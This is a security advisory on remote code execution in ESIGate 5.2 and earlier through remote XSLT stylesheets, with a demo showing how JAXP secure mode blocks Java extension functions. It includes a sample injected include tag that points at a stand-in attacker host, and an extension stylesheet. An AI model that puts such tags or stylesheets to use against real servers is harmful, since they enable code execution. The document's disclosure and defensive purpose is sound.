An attacker can execute code on an esigate instance by injecting a reference to a malicious XSLT stylesheet into a backend/provider application. This requires control of the backend/provider application (directly, or through an injection point in it).
| Who should read this | All esigate admins |
|---|---|
| Impact of vulnerability | Possible remote code execution when an attacker has control of a backend/provider application (directly, or through another vulnerability in that application). |
| Maximum security rating | Critical |
| Recommendation | Upgrade to esigate 5.3 |
| Affected Software | Esigate 5.2 and lower |
| Reporter | This bug was found by Benoit Côté-Jodoin from GoSecure. |
| CVE Identifier | To be assigned |
ESIGate supports the <esi:include> tag together with a stylesheet attribute, which may reference a remote XSLT stylesheet that is applied to the included content. Because the XSLT is processed without restrictions, this feature lets an attacker execute code on the ESIGate server itself. The attack requires the attacker to get an <esi:include> tag reflected into any page served by a backend/provider application (any XSS-like injection point is enough). From that injection point, the injected tag points its include at any page and its stylesheet attribute at a remote, attacker-controlled malicious stylesheet, which ESIGate then fetches and applies.
Update to esigate 5.3.
XSLT processing has been switched to secure mode, which prevents advanced extensions from being used. Esigate will display an error if a malicious XSLT stylesheet is used.
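The two behaviours described above (unrestricted XSLT before 5.3, secure mode from 5.3 on), as an added example that is not ESIGate's own code. It assumes that the "secure mode" the fix refers to is JAXP's `XMLConstants.FEATURE_SECURE_PROCESSING` on the `TransformerFactory`, which disables Xalan/XSLTC Java extension functions; ESIGate may apply it differently. The stylesheet and the injected tag shown in the comment are constructed for illustration, and the extension call only reads a JVM system property to show that arbitrary Java is reachable, not to run anything harmful.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class EsiXsltSecureModeDemo {

    // Constructed example of the tag an attacker would reflect into a backend page:
    //   <esi:include src="http://backend.example/any-page"
    //                stylesheet="http://attacker.example/evil.xsl"/>
    // ESIGate fetches src, then applies the remote stylesheet to it.

    // Constructed stand-in for the remote stylesheet: it invokes a Java method
    // through the Xalan extension namespace. A real attacker would pick a more
    // dangerous class; the mechanism is identical.
    static final String EXTENSION_XSLT =
          "<xsl:stylesheet version=\"1.0\""
        + " xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
        + " xmlns:java=\"http://xml.apache.org/xalan/java\">"
        + "<xsl:output method=\"text\"/>"
        + "<xsl:template match=\"/\">"
        + "<xsl:value-of select=\"java:java.lang.System.getProperty('java.version')\"/>"
        + "</xsl:template>"
        + "</xsl:stylesheet>";

    // Constructed content standing in for the page fetched via src=...
    static final String INCLUDED_FRAGMENT = "<div>fragment fetched by esi:include</div>";

    /** Applies the stylesheet to the fragment, optionally in JAXP secure mode. */
    static String transform(String xslt, String xml, boolean secureMode)
            throws TransformerException {
        TransformerFactory factory = TransformerFactory.newInstance();
        if (secureMode) {
            // The hardened setting (assumed to match ESIGate 5.3's "secure mode"):
            // extension functions such as java:... are rejected at compile time.
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        }
        Transformer transformer =
            factory.newTransformer(new StreamSource(new StringReader(xslt)));
        StringWriter out = new StringWriter();
        transformer.transform(new StreamSource(new StringReader(xml)),
                              new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Pre-5.3 behaviour: the extension function runs inside the ESIGate JVM
        // and its result is spliced into the page.
        System.out.println("unrestricted: " + transform(EXTENSION_XSLT, INCLUDED_FRAGMENT, false));

        // 5.3 behaviour: secure processing refuses the stylesheet and the
        // transformation fails with an error instead of executing Java code.
        try {
            transform(EXTENSION_XSLT, INCLUDED_FRAGMENT, true);
            System.out.println("secure mode: unexpectedly succeeded");
        } catch (TransformerException e) {
            System.out.println("secure mode: rejected (" + e.getMessage() + ")");
        }
    }
}
```

Run it with `javac EsiXsltSecureModeDemo.java && java EsiXsltSecureModeDemo` on a stock JDK (the built-in XSLTC honours the secure-processing feature). The first call prints the JVM version string, proving the stylesheet reached a Java method; the second throws a `TransformerConfigurationException` stating that extension functions are not allowed when secure processing is enabled, which is the error a user of 5.3 will see for a malicious stylesheet.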
No workaround exists other than ensuring that an attacker cannot inject HTML or ESI tags into the backend/provider application.